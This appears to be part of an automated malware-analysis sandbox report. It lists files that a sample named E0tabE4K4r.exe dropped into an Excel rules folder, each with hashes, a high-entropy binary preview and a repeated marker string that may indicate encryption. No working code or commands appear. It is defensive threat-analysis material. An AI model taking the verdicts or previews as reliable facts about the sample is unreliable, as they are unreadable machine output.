                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120652v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):804
                                                                                                                                                  Entropy (8bit):7.755461755613865
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:SlH92fmBGgdwCmeapfVw+FZx6HxG4NrxuPnjH0wMw7C9XTrtrFeiAQ6x+ASUdNcq:odcpgdxmemx56HxvNluPnqOSFhGQV2bD
                                                                                                                                                  MD5:CC551C2614A56F76DDA59F118085E9F6
                                                                                                                                                  SHA1:2330CB8CBDF831A6AA2E5F6A6ED164BEB3C8AD8C
                                                                                                                                                  SHA-256:ACDE9944F19E8AC0BD202D58BCEE06B73B25DB634BECD79BD52D24738C8B20A6
                                                                                                                                                  SHA-512:3DDE7E3E59D7DF26035D4957A7B048024571C3790797E2FDCA9919EF9FA89529F6BEFF83AF0BE525076718E6FE4C9268999AA2B222202DF6F2D1B7CA6DC42444
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....".).V:..5r{:..q.....1......M..pi.....5...e..<.(w..~.LE..n....VFO.p..%S..%T.W....o."..D.t...........`.$.....uJ+.I..&..<7K...y.....Y#{.S/....AD}D...........!.. 6...%_..lP..T.v.-O_....tJ..W.z;j.....N..+..^...u[..v&c.p.u..`.....i. M......yfw.E..o...?..=..Y....u.D....M..i..v.e.n.SR .~.+..T\i..Gx.8b.F..@...U.H...qohGL....3..-H....R....]Z0&5........t..$..=I.{.7._....}.s.Q#...J>.I.T.]<..K.=.....2?G...{.<s........S.......S....l...[...X..k(..U.+.4w'..2n..`.........N.=i.'..>2...._..k..e.k..A....b#...QP)0Z...#.R\..[.G....jQs:G\...h..".+\.:..":.W..w/.I...i S....[......!KIU.d>..x.i..L..Zf\8.F..B......k.=.P..bU"..n.(hgmH-Y:.$.....k...7.s.!........o]..Ev.M..I.6T'.....#(f.....xx2.,f"mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120653v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.696807618459891
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:wbmA5mH5CvHsEwPQa8iANQLlKK1zVo2RAG4Q6+/XkDy1nEt19tZp1Yjr0zSce1KS:wK5H8/sxchQRVo2RAG4Q6+by3tZXYjrd
                                                                                                                                                  MD5:28572D4C29E6FE91CD50EF94A3FD059C
                                                                                                                                                  SHA1:6B9EF8FB81A9F4AA5E59006748CAAE93C533E4EB
                                                                                                                                                  SHA-256:C41BBFF16947106CA140E448ADFAE0F2104464C1DDD6126FF5444D9CC2841874
                                                                                                                                                  SHA-512:9BCC5D180B13D003BF324BFC035461419D692D39957F5D1C38B3A5C0DC8A50D5E6AE2A4FB2C4818E7F49C431DE3705C8A078B81973D296D855D0197917D98399
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlM.IR#..H..@.....$..5......G8.>.8.],.#x....Ron9.D.%.....'...C.UC...(.7a....e..$..${}.Z._:*..]..x...U....uR..........m:......r.....yh...V...w.b..Cr..j..?@).?O....o.lK.=.`.?..._%...q...{&..M.$...S...Ls.).-.8..\/bs.&_.h....uvG..>...6......2..._t..p=..n.qEQ....A....e...CQZ/.......hS..C.y......"...`uG......v.i.H|.kO_..>.5....k.&y,..%w.y.-.O..Y@(....i.......X).OT,F....0.bjm..pVr......%CM..B.l/....3.S..U.S.R.X.v...eT..R{S.;....Y./.<\aP~...'8..S..1.4g~Q./^....I....r.......2.8n.ojfF...a...V....@'......kX8.|......y.H..p....;..hR0M)......,`.I..)-..]...RV&.......W^..hq...I&.i..2......7..a#?.mX.hA..P......+.....s.O.}.%.?..n|.T;..iC.>....U.....6v..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120654v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):810
                                                                                                                                                  Entropy (8bit):7.709416441925894
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:r4FEpyXkYmVNV371WjpgrGqrBobbc8JVOp9UY55Cv4S2NIFk6MiGDl10nViYSUdV:EoV/vflov+TVS2NIG02lqVi/2bD
                                                                                                                                                  MD5:036D4FB961A38C10A325ED982A6320D3
                                                                                                                                                  SHA1:4EE3CE60AB33E55064297F2AC3A403DC3D049B41
                                                                                                                                                  SHA-256:64C2C6822329D6E570D1EB85950B5A769DB8A77B01D7C239EBABDEF87715C5ED
                                                                                                                                                  SHA-512:33027E148322089FFBB4980ED63410BEF5A67FD9925438140BB7287E214BC06799AC4ED114794A7BAAF8EB2B85856C7176A8F418F43FFFCF66FDF08B13207C74
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlz..]o..RO.}.......V..P*.T..C..{..`....v..q..-.......`'..9..x....K....q.-.K.B.&...e.Y.OJ6.C.o..M*.%...<M."~M_.....hM>.,.T.$KL...........-;SMY.fO.g.F........E.,ek....>..Bi....}:}.m.e.WZy d;..B.9..t..J@....tL....B..st.2.....S.....0.."r..D.,.P.hM.q(i..f.q..|...V!#..@..j.\(O...A..L-...>.Z3.0.......:t]. .\$D.Vo...<...EWC.O$.2.........~.L.%..,H..P.......8yU...^0....d..Z.D9-..-.~U.9.7....|....:<.b70...!..n...Os.V...1.MW...Zj.k.......8J..5s..........i#.jwK..A.^...K....&.8..3E.%......Z....`..N6.h,2(.A..*2.1.m/.....a$.vpm*.....Vq."}o..(.&c....D.....:..n...)&3.<Y....B..t....I..I....].J]K....p.3[.-..~......B.OLNU....K..K.L.QV.v....F..CIK.........Qp7..C.+..._...SG.J.....c...<.I~..$p.?..3Jd...`..-...o/.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120655v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.660917256297363
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:4P41KmpsHkR0ng3qcRPXpIM4ROcRVatbGwpW89rHH7R74GqVWWSizLq6J8FSUdNX:4PsKmCHkR0g33zZMV+6pErHHaGuVSyql
                                                                                                                                                  MD5:A56ABE1BEBBE2DB95354D6132D7DC8E9
                                                                                                                                                  SHA1:23F135E0EE6C4493B93761498B78233A39FB4774
                                                                                                                                                  SHA-256:50A8FEB0824AD86F37EC4B6E2893A00D2FCDAF7918AE1B9FF594AB66BD3D4BA9
                                                                                                                                                  SHA-512:A207D299CC586C4FD905D4230A85BA72AA5FA86871ABB906F5350E041906E9B85DACDA65C1B06ABD49A094570872FC52BCC763B7C9D945F9F9D5A1391384DFF0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml:H.z.=....(P..qY]O&uf...X.!.4..(.JM.<.-tRd.l.7/.......X.:......"..^F.Q-.i......R.*..._L)'.F.....'.....$.R.X.."F..U..o8.._)bb...~...].2.....n].y.wU.../2h.U.z..[..;|.1B.f2.c.g!..EOK.v[.....Zv..}.p..w.jW.fel.etK.,......6..bq7y.......0....+.Td]..f..M.J.*.$.S....9K2..@.....s.S.>z..T...M....)k....F'..5G..p!.p&...Q{.....-....v6.ppE..........#...g.'...........H.U._..L,M.`.`.&@..v.......-..u.nI.......{.vL"k...<.k.|.3Qq@.*/...6..aLT2R.....2.j#.o......!..1-s...<...u5..Kz.....Sn5..wG~..}d7J.R....1{.J. .J.z...R...o.[.%.E.i\}.8..pU.......e.P.{..l..v...-S....).g...O..<%.xP.g.....2f....O.o.Ta../Y..._.0...d...P.}..}.Ck.b.....u..T}..C....5.T.`.D.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120656v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):810
                                                                                                                                                  Entropy (8bit):7.721079383101139
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WMm7PKdIaHDPsaVB1JhQ4miQO0jAu4x9G92bD:cLdO0ab+ZiQc1SWD
                                                                                                                                                  MD5:02A6CEB2D91901C6F801DE20863FAD9F
                                                                                                                                                  SHA1:9A933C54C1143D8E64608F44F007C453ECF0901D
                                                                                                                                                  SHA-256:3AF5E28282338BCEE4F0423873B095C11480F67B151A470F21F5C1A514203FAA
                                                                                                                                                  SHA-512:224F196093978911C882CE4655EE0A0262FC7F7BC790A36BC8B74CBA75251840AC7D0159366F83517D7AEA2314EF3493FF24E1C6B62403834B89A72B50C9948B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...0.U(...;J.....{=0.Ve]k..Q...Wy...TM..^.."=P....&_.|..G&..x....X.........9..h.\\.]W.B2xm.d..o.$...........}.Vj%..(....4h..b)\......c..k.r.o&.q...L..w....>Zs.....VE...&..Kr...NX.KB..c)^z......Hc:..A;...g<].....WfX.g.Kn3..u..6t....d.2..*.A._...`.A. ....OZ .R%j|wA....p.?*.O....O7....q..I.dL.L..V~...ir-]$m....<..~..e...{...i..!..].x. .{rD*c..W.Z..=S.5e...Fq....h.4.}r.&[n..C....{BR.k....3WY(.WD..u...<.=.U.^..<.g..]...".*...`..16..J.3R.y....S.c3ly.8en....gzTEZ..q...l..x.E.z..0.8-P...F..M.-...W..Kz.....NFX...L.9...M.ES&&w&....u.....{v....1...a...pE.h..x.e..;....f.<.w...5@9\.....0AIR.[G..+...<..*...1;..mG.....N...!.......oK.../...w)..F.y.=}e?ozYIn.a4.>.D_..J......[6,.;......xx#.L...j..?].X...P...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120657v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.72125740069865
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+OUplWZMxFzY63uZeWy5Hn+J/LR/8Jget7rNmYz3+lQO+973T+etNy3/pdV65SUn:rMQ3XcC/Lx8zr337OCietNy8M2bD
                                                                                                                                                  MD5:1C02D7461F26271AABC7D76591060213
                                                                                                                                                  SHA1:B7180F7EBE4B321E8063747ECF3B4EF1D41B7BCA
                                                                                                                                                  SHA-256:92CA16A32902A4DF695ED2E78497564CEB77D0FCA525F870FD684FB87BB42E8A
                                                                                                                                                  SHA-512:B247B704AD0BA405F590CFD119F9C65E6DE399122024E59C1251A894F677E9D944FF5FCB8233844960625725657AB7C2B7EA392BBD506A31CBE624C94C634A16
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.2p`.<9...Oh.bb.^^.iCt/...1.N.:..A.Jn|...j...+9v.6.......G.~.-.K......M..`.E.....s.8.RRZ..W.'..{j.in.-.~}S._.2....@UUT.....n..+6d..=...~-.v...P..B..V.49.h1Q{...mE..8.(....r1G...b...xU.l ..M.tV":s-..u...'i.].G.V....*.b.....4/..7B.9.....L.fJ[k..;*..J.5..j.(B..5..h.Ic6....3g.V.D.....m.:"...A....vS.LgG..V.s$.R..V..94.hq.u.K/.&F..Y.|.k%&.0Z..l6}1T(......8...d.......?.,.^..[..s.Cz.3..V..5...I..G...."Y.`.......i~2..1t)....vaI......~.....Gs.m.*.H.#]?{:b..ul.<.8.JS....L.m.n.9.yn,e.g..AVt...../.....1.,.U(...........~.....X(t......\.9..c.0........fw..h.b..i....._.5....9I..N..D{..b...U..mo.?.>.ci.Z*:y....j/Vq}X...rp..G..0.....+.....rs.3mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120658v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):805
                                                                                                                                                  Entropy (8bit):7.709686351518636
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SZCSFeYMIEStvDjVTBF/tHatgPvcg3kPU2bD:SYVGvDjRNPPvH0PnD
                                                                                                                                                  MD5:508433E20B194509E2ABF2744B8E7761
                                                                                                                                                  SHA1:BC7151D06B2327CAFB9CC5EA17196E0C4CB1CC7B
                                                                                                                                                  SHA-256:E9D62C93EF6652869D64E2F9F8FFC22AF4E8DCB3EB34252F5325945AB9A30CF7
                                                                                                                                                  SHA-512:1639B019901A461CA62A4771A8F90CEB6EC9320E44D79035F20D0E7135FDD8911249403923A9E9D26F4590FDA9BFC43851F1B11F1BD41533D9CE30056607131C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.Q......G.3.~y..g.4......dB.p#A..S...z...jU...A..|3. ....W'._.aN......t..z..N.x..f..z<.2..;.S..J.).......f..z.#~..q.^.....7...Y.E.7.S.l.2.k....<zC.?.[.Q...$...U..[..@.@h0.Y.).........woS,..rD#..X>;.+^.?1..#..R....?.........!..b ..L.:]Jf....%.9}...$..k.....3...........&*9G..#..z.&&x.`M...E. ..$..O.Z......1.....`0.+.<[...d..N...d.$./..w.fDq,A.\..+&.[6o.`P...)...`..,z"....N.a.....T........'-...G...z<.mAn..)6Z.y.../.~..\...3..,.D7.N..z.=4..Qd_..Vxh.a]....n./cl.>BH..'....7.e.....t..J)..3.Jb[<^.....nwv9).j8.>..5.}1..|O.G59V...!.&...Wi9..m.;4.o...[.33.Z..D....Cw...u...V...L..[.3..Q..Q...L+=F..v.K.J4$.g6...k..s,.g.A.......1n$.l......=F.4.I..g.^\....R-C.-S{............InZ.*..U.'&./0'..7..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120659v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):801
                                                                                                                                                  Entropy (8bit):7.756950104232579
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IK+EXV7mqZIH4myYu93seWl6+TkjzoX82bD:I/EF6DYlz93seWE+A4/D
                                                                                                                                                  MD5:409380ABD08D61C3D79343E151371B7E
                                                                                                                                                  SHA1:7A34778181F09F1D2DF8EA9FCDE23F3FBDDA174B
                                                                                                                                                  SHA-256:0A6EC201EF023388E35FC0C3EB150409ACB38314112D1B7072405554D225BA5F
                                                                                                                                                  SHA-512:BB80D41C0AFE6DE0DD240E9486C53A4AF327A663CD1A8A29CC78B2407CA099A3978871D1F0BCDD38AFECC5132B9C44A559BAF1ACE3D78F7F677710CFB8C78C54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.GE.........m.H.&..Dl..m..!.A.w....4e3a..i.9.s..../."....e.\..2P.Z\.H.E..l.E+.7?,[6%< OXO..g>..|.N....q.cG...J.....W;z.".q..)..a....Kc..X.>......2..P..46.|`......./..^l.....JS`..../.TR.n.)}u.8..6.v...-.-<..?.|...jkcQ.<s{...*....H.(......e..aH.J..#.1.[...Ye..&..mKg.L.z..3...3.....%.DN.....f`4c..o..."\....|U.u..F..O~.YHM....%*h.\.R.g..G.d...D.l...{.... .%.^..T.........;...b[u....i."..[.c..V.;...C.}..r0.AJXv.....k>C;..Z.J..b.>.E}).....V..i...mH6.{.;H.{.}a.@F.B.......u.._g>...%!ow.m.....3..9S1....... .w-......X...W....g...t.....M..........t..S.t.-*.Y...b..?...ZzN+..|....w:p.*.W.*'.'........N.ZY.....J..8-..0..i....Y..V..b..B;....d.'...A.L..X.....Z.V..M..^(_(..e......hdE...-~..lTg..7.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120660v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):818
                                                                                                                                                  Entropy (8bit):7.746349855568
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:E8UTxWRpdqkbA2sVAk15hfXW9F2WELhOCV2bD:E8P8kGhPW9khOTD
                                                                                                                                                  MD5:E81EF267DC3D71F75E567A48DC470E29
                                                                                                                                                  SHA1:403F27A6CD62CF5F29C4BC9CD77BBFCFEC7FFD0A
                                                                                                                                                  SHA-256:14D6BB23D9D0AEBE3889FB914E01714BE4956EA5382B1B6410BBDB7AD73CADD4
                                                                                                                                                  SHA-512:9DB00324DD6A627CCD2650EBF0B963789CDC98A528D9CBD20E08F1B0776B6538A82D0F4D367649B1FB405F718E6B21248555A9BBFDDD549FF40A274522F1D8F9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...C.V.~......m..t..ky...%"..Og....v!/....>............jH``..N......y.F.h......d..............\:.'.A.G.d....di.f.....f..#*...._..,..#.r....W.@.p.@.Q._GaB....$........=..#..}auo..U8tL..f.s...J...d.(........p..c...4f*o..p........f!..._U....(..W..Z..g....+....F.........t.M...Yp.......$=^:.|..d.............QK.F.T.!H..."...Sf.u..%....V.Yz......j..8.5......i.}.).:... V.,...Y.}....G,./IzC.....N>dt..^..fI..........T.h......{.......T..+......l.,.....H./....).2{.|%mIT.&@..*U....v.......6\....B.7.]. ..'.U..U..tzl.(...>....P..cgbz. n..b.}....i..........A.+..M..p.c.....Ou/f.K..T..E#o.4...F....)..<.y....=H..K.....`(#.U.-...)......((+Rae..T.:..+C`....6E.w....^G.V%5u)...%..&..._..h..<zY.oa!y....W....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120661v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):744
                                                                                                                                                  Entropy (8bit):7.727174258455794
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:iWHQVTwZAy1MJZz9JGoWUV8cc01iFwrdfqjc+Rfkde7V8J9j320jViLUSUdNciik:icQMTAzuo1jiurkjxRfP7WP320jeL2bD
                                                                                                                                                  MD5:59604D559F407412D783BFD25ED4521E
                                                                                                                                                  SHA1:A43FED849A765892950D1AED872D1BA5ADAC0827
                                                                                                                                                  SHA-256:9F00D4C746292E5E143E09C6C70C41E0501D89274890E119E1B57DCC335C5E72
                                                                                                                                                  SHA-512:9725539B92D3E00A5764F7F17458D8CFDFA617B8CEE7B19F4286C74465BB8C10D4BACE95B86D092875A1D853EE9D37A3013D5DB50A9EE179EED5AEBB0ED94CE7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..... ...4...0(...0.=.^. YPt...QI...R.$..D..cUF.j37Q3'.g.....L..1~......t.@.u.....,.!A..nH.......p..+]...{]H.,.l)L.e?.......wL.U.K7>:..oO....RW......t....e..Y..~7C@3..z$.eJ._W.W.R..f....y.g...0...._...../..N.......M...Q.U.#xl..r8.?.@....*q.64.&,..9b...g.q..%'.Ge:SX8...."..w3#.QT.j.....+.m....VBb;?..`B+.o...[.6./:...bJ..M.ry.....$......NaI:..gC....../_).`........ ..."......5..B....%U7.._..F......c..u..s...B.$"]O2....Z...T).h.=.a.......)Q.........}....T>...HU.E.$..w.......N./.G..c...S.0b.....UO.#.X|...<..}......A7./.>.F..^.o..Q8V\zXN..=.u.1O.. ...@`N..R}.....F~..i.[q..?....DZ.......f......((...3..2#..z.56.T.|.q.?mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120662v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):803
                                                                                                                                                  Entropy (8bit):7.714332935993599
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BbT9t8+t5oubG2WorO6S4YnqeGOxOEmUF2bD:Bg+t5tTtXKqnXTUeD
                                                                                                                                                  MD5:59EADCD3BD0EA7FBBEEE833C1439A5A2
                                                                                                                                                  SHA1:CBFB16C3481C22A6CF13B957CCB57D9A8D4E87EA
                                                                                                                                                  SHA-256:F917B6904C1B62FE7A2F53A5C4316ADAAD61BD98C8E06B87C5888E5E599F8F15
                                                                                                                                                  SHA-512:4BEE9B7BDC2C702AB47631034192D270F06A1D0506A3A82FC4E633B7BE29DA0B1685CF5B95BB2821FC40768F8EC97662C0C807230A7EF034C0B4804E7D274BDE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlOJ...'....#^.|#..."...8z.3"8m.s;kf.F......"V.,F....%.....y.z....h..n.>I.Q.<p.....%....Y..i.....);...=.^..g...5......B....B.G..s.WBd9I.v'~...q.+.,....9e..w08I.cX...:.4.. 4.........r.^..T.Ro...(#Tw...j0.j+...4..A.C.....`...~.....Hf~..{....s..XE...\.b..E...;\#..E...Ph.;~......s,..A........K..`5;........:....KqXv.Y.:...ZT.w...%y tp.P/#......v.P.p..3.$...F\.'.H..{m..:I.}y.h..d......6'.9.%..+..SV....{..?.^...A..U..!7tC.B..1Z8..f.-<......Q..r..T..v..%...9.. .{Ks:O.^E.G.#.N/".r.s......K.s..a.........4.O..._..ys.!F.i I%....sWY...i......m}K.5.R..O.lv....3C..U.3...._U.q%.o..Y{xN....j..&v.u.Uwy.5..Z_g......bA.^&tW.>(...q.?E..k.kxO....K.\Rf.F.!^.s.F..O:q.$.A.I.;..r......b.@....\{.._.7....^...a9mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120663v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):760
                                                                                                                                                  Entropy (8bit):7.683795969157959
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qMsDaMsH7qcOm+GY8lLo3KVoY9dVkvlxSDG1lkp4MJfRhBVN036gD0ZSUdNcii9a:ZsDaNm1GY8po3rlx+qc5dnz6dT2bD
                                                                                                                                                  MD5:34D7320970939301E709A6F4537DC165
                                                                                                                                                  SHA1:506DB8C52A19DF162B2B97F98A33C21ECDE45C28
                                                                                                                                                  SHA-256:03E9F286D0F16F4790E9411DAC345CA62ADCB044DE8A9A38F21E7ECFA24E4777
                                                                                                                                                  SHA-512:325C1DF15F90439BBC407E76EB48D8ACC476FC855534D71E3595F0EA5358C2B9F529407D1AC40AD2CA3A7722B711C62C446CF4092F0241ADA09C9CB92A0293B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmln......_(..G.._.X.T....<@.7tZ.(....i..\VO.....{.E.V....z,.cg.(..dki...!./cZ5.....I!..0.f"..c.-...Y.w........2..z..6......"...x.1..Y..M...<.3..;...O...Y...f3.,P.-....;....<R..."i..Za3..c..A.N!......*..).0....g.6..*......n...f.2.d.=.#W.....B....M.47.......t......A....\dn"}v.j.......70 ..g....m.H.....[aD..hJ......}.K$g`...v.zR.y..V..nj\.h~qd..&..H...x1m.8.7`...i:*.N5.>#.V<..oX&H.....R.u....SU.Uz1z....}.}.0....@..J%B."..b.t'....A.I..*{N..-u.^.,<.*...V.....q6....^..h...$.q~..1.8d?.a..g....*...\o...B...d.C].H..VT.1...x..4...l..x.iz..^....U7..n.nj.q...jPR.6.........FF.B......R.....Oq.9.xQ.N..^-.h.._M...E&..4.M....A8.....;..I....H...w..wr.9Tgb.!..\.".mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120664v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):835
                                                                                                                                                  Entropy (8bit):7.703655075469457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:OWaOKCS0nhzczr1qpxHoh8AphBq7j2OwDuSVDE2fffRtenbKYS5SUdNcii9a:9aOKCSewqpmqKACOwDPxE2fff6bKU2bD
                                                                                                                                                  MD5:7F83D2012DEB5CFCAC9B7648F84AF30F
                                                                                                                                                  SHA1:78C4D52561F3C5752DF675590CA4F7FA8C3A0CE8
                                                                                                                                                  SHA-256:7225BEEEB5FCE57C3E6F85B11E6119DFA75BBBB12172E8D48A78C7AFB3A1CFF1
                                                                                                                                                  SHA-512:01C6B7BDF5430CA97B5E5E1566FF28E9940163883603AD4E3AFB3642E1EFC259C7E327181DEAEBA69ECAE3ADA87C5833EE1F53895CEBBB6105774C93FFF61A4A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.0.H...<9.vf5..F...)..Q...QU..>.\. ..?..J.z..a..I...HM...>.{.oM!.p...Ct1.?..O.O4..Dc.mz...|=.%bR...X.tL.5Ft....AML.5...Y.s...9.,.c.=lC.xf..[s....}...N.2......C.......8.y.W...`M(..%,$.F.;E.(..[..........EQ....%+hDH.3.=.@..;a.v3.7...Sz.h...l.L...=..&..r.A .&.q0..C..[\.:~...gL6.Zc.^M..Y..|8...JC..[..Ep...}O...}[.}.-~..i...p...Z..{..../Z.?.dB~?@...KY.l.........k..}o....#....AN_...../..Um. .%.r-....$..`.=q....V.....&.....>-@.C..F6.....&...3..H.@9.l]|.....4%eZf.EI..S..{...4&.LEu.V...i..Z..Oy;>.....PU..g..G`s7v.xP...6..Vz..*....VV....g..u..*.=..+=C^...z.q+.`G.D.v5..f..c...=.~.S..e..cS{..KZz..+.5.v>.\..YX..2......\&"......Dc....t..D..O......~#.y.`..N.l...q...).A.2.S...........0.+O......V=f..4..?..Gp...v.j. ..n..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120665v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):740
                                                                                                                                                  Entropy (8bit):7.73045039753968
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:CCXS9EIJK/mu4q53NOU5gDoydZ1aZu9T8q6W7pC3i46H2tutvyFiKAxdQZ0HSUdV:eOuKD4C3NOUcNdLaZ0BNC3btutvyFiKa
                                                                                                                                                  MD5:BAC9C74CF9BE538A50B9D7810395D3D4
                                                                                                                                                  SHA1:C651D94154106DDA415F7D17942A9FB139D841B2
                                                                                                                                                  SHA-256:AC6211D96A7F726325D2B8BC8D012482C9DD43F184D0DEF775FFABFCF30D9337
                                                                                                                                                  SHA-512:4AE19452DECF68F799B678A796A5826A97326F1890BDF0628E3CE2F3005DBEE6CA3CA5A822554DF82DC0B1B2DE410973C234C96AF456383E215C37553C9781E8
                                                                                                                                                  Malicious:false
